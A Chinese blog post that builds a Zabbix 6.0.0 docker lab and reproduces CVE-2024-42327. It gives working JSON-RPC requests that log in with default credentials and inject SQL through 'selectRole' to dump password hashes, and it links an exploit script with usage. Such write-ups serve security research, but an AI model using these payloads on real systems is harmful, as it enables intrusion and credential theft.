环境搭建
创建容器映射文件夹
mkdir -p /zabbix-server && cd /zabbix-server && mkdir -p ./mysql/data ./mysql/conf ./mysql/logs ./font ./snmptraps ./mibs ./alertscripts ./externalscripts拉取相关镜像
docker pull mysql:8.0 && docker pull zabbix/zabbix-java-gateway:6.0.0-ubuntu && docker pull zabbix/zabbix-snmptraps:6.0.0-ubuntu && docker pull zabbix/zabbix-server-mysql:6.0.0-ubuntu && docker pull zabbix/zabbix-web-nginx-mysql:6.0.0-ubuntu上传.ttf文件解决乱码问题
cd /zabbix-server/font/rm -rf simfang.ttf然后随便在一个windows中复制 C:WindowsFontssimfang.ttf 文件到/zabbix-server/font中即可
docker-compose.yml文件
原作者的用不了不知道为什么,自己改动了一下,这个docker-compose.yml只需要更改ttf文件名即可
更改成你放进去的名字
version: '3'services:mysql:image: mysql:8.0container_name: mysqlvolumes:- ./mysql/data:/var/lib/mysql- ./mysql/conf:/etc/mysql/conf.d- ./mysql/logs:/var/log/mysql- /etc/localtime:/etc/localtimerestart: alwaysprivileged: trueenvironment:- MYSQL_ROOT_PASSWORD=myrootpass- MYSQL_DATABASE=zabbix- MYSQL_USER=zabbix- MYSQL_PASSWORD=mypass- TZ=Asia/Shanghai- LANG=en_US.UTF-8expose:- "3306"zabbix-gateway:image: zabbix/zabbix-java-gateway:6.0.0-ubuntucontainer_name: zabbix-gatewayvolumes:- /etc/localtime:/etc/localtimerestart: alwaysprivileged: trueports:- "10052:10052"zabbix-snmptraps:image: zabbix/zabbix-snmptraps:6.0.0-ubuntucontainer_name: zabbix-snmptrapsvolumes:- /etc/localtime:/etc/localtime- ./snmptraps:/var/lib/zabbix/snmptraps- ./mibs:/var/lib/zabbix/mibsrestart: alwaysprivileged: trueports:- "1162:1162/udp"zabbix-server:image: zabbix/zabbix-server-mysql:6.0.0-ubuntucontainer_name: zabbix-servervolumes:- /etc/localtime:/etc/localtime- ./snmptraps:/var/lib/zabbix/snmptraps- ./mibs:/var/lib/zabbix/mibs- ./alertscripts:/usr/lib/zabbix/alertscripts- ./externalscripts:/usr/lib/zabbix/externalscriptsrestart: alwaysprivileged: trueenvironment:- ZBX_LISTENPORT=10051- DB_SERVER_HOST=mysql- DB_SERVER_PORT=3306- MYSQL_DATABASE=zabbix- MYSQL_USER=zabbix- MYSQL_PASSWORD=mypass- MYSQL_ROOT_PASSWORD=myrootpass- ZBX_CACHESIZE=1G- ZBX_HISTORYCACHESIZE=512M- ZBX_HISTORYINDEXCACHESIZE=16M- ZBX_TRENDCACHESIZE=256M- ZBX_VALUECACHESIZE=256M- ZBX_STARTPINGERS=64- ZBX_IPMIPOLLERS=1- ZBX_ENABLE_SNMP_TRAPS=true- ZBX_STARTTRAPPERS=1- ZBX_JAVAGATEWAY_ENABLE=true- ZBX_JAVAGATEWAY=zabbix-gateway- ZBX_STARTJAVAPOLLERS=1ports:- "10051:10051"links:- mysql- zabbix-gatewayzabbix-web:image: zabbix/zabbix-web-nginx-mysql:6.0.0-ubuntucontainer_name: zabbix-webvolumes:- ./font/simfang.ttf:/usr/share/zabbix/assets/fonts/simfang.ttf- /etc/localtime:/etc/localtimerestart: alwaysprivileged: trueenvironment:- ZBX_SERVER_NAME=Zabbix 6.0.0- ZBX_SERVER_HOST=zabbix-server- ZBX_SERVER_PORT=10051- DB_SERVER_HOST=mysql- DB_SERVER_PORT=3306- MYSQL_DATABASE=zabbix- MYSQL_USER=zabbix- MYSQL_PASSWORD=mypass- MYSQL_ROOT_PASSWORD=myrootpass- PHP_TZ=Asia/Shanghaiports:- "80:8080"links:- mysql- zabbix-server
启动环境
docker-compose up -d映射到80,所以直接访问即可,界面如下
默认账号密码为:
Admin/zabbix漏洞复现
由于漏洞是后台洞,首先需要获取账号密码,这里使用默认账密
POST /api_jsonrpc.php HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.24 (KHTML, like Gecko) Version/17.2 Safari/616.24Connection: keep-aliveContent-Type: application/json-rpcAccept-Encoding: gzip, deflate, brContent-Length: 119{"jsonrpc": "2.0","method": "user.login","params": { "username": "Admin", "password": "zabbix" },"id": 1}
账密错误的话,响应包如下:
账密正常的情况,响应包如下:
拿到result的值后,使用第二个数据包,将auth的值改为result的值
POST /api_jsonrpc.php HTTP/1.1Host: 154.21.200.44User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.25Connection: keep-aliveContent-Length: 167Content-Type: application/json-rpcAccept-Encoding: gzip, deflate, br{"jsonrpc": "2.0", "method": "user.get", "params": {"selectRole": ["roleid, u.passwd", "roleid"], "userids": "1"}, "auth": "20b3fa81927949fbc55bfdd008674b22", "id": 2}
结果如下:
可以通过更改userids的值,来遍历其他用户
selectRole参数可控,直接在后面加上sql语句,即可执行
利用工具
项目地址:
https://github.com/aramosf/cve-2024-42327使用方法:
python cve-2024-42327.py -u http://you_ip/api_jsonrpc.php -n Admin -p zabbix-n参数是用户名,-p是密码,然后替换目标即可。
结果如下:
原文始发于微信公众号(进击的HACK):Zabbix从环境搭建到漏洞利用,附批量漏洞利用工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论